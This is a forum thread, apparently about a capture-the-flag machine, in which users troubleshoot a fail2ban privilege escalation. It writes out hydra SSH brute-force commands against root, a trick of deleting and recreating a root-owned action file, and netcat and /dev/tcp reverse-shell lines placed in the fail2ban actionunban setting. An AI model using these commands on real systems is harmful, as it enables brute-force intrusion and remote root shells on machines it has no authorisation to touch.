Posts: 12 Threads: 0 Joined: N/A use hydra
hydra X.X.X.X-l root -P /usr/share/seclists/Passwords/Most-Popular-Letter-Passes.txt ssh -v Posts: 19 Threads: 0 Joined: N/A (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7 I don't have permissions to write in actions.d folderPosts: 12 Threads: 0 Joined: N/A (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder Only to create new actions Posts: 19 Threads: 0 Joined: N/A (June 19, 2022, 02:47 PM)netrise Wrote: (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder
Only to create new actions how did you edit the "iptables-multiport.conf" file? Posts: 26 Threads: 0 Joined: N/A (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder
Only to create new actions
how did you edit the "iptables-multiport.conf" file? michael@trick:/etc/fail2ban$ ls -la action.d/ total 288 drwxr wx--- 2 root security 4096 Jun 19 12:24 . drwxr-xr-x 6 root root 4096 Jun 19 12:24 .. -rw-r--r-- 1 root root 3879 Jun 19 12:24 abuseipdb.conf https://unix.stackexchange.com/questions/18095/in-linux-is-write-permission-equivalent-to-execute-for-directories/18098#:~:text=and%20removing%20entries%20in%20it Posts: 40 Threads: 0 Joined: N/A (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder
Only to create new actions
how did you edit the "iptables-multiport.conf" file? You can delete and recreate the file Posts: 36 Threads: 0 Joined: N/A Can't seem to simulate the 10 requests, I get ssh errors using hydra Posts: 40 Threads: 0 Joined: N/A (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine hydra 10.129.X.X -l root -P /usr/share/seclists/Passwords/Most-Popular-Letter-Passes.txt ssh -v Posts: 36 Threads: 0 Joined: N/A (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hydra 10.129.X.X -l root -P /usr/share/seclists/Passwords/Most-Popular-Letter-Passes.txt ssh -v Odd, I tried a lot of things, letting the michael shell open and starting hydra, closing it and starting hydra, seems like the port is unavailable for some time and it might be ruining the time Idk. I'll keep testing things, I might have fucked up somewhere else. Posts: 45 Threads: 0 Joined: N/A (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this: actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash also tried the bash revshell actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1 doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned |
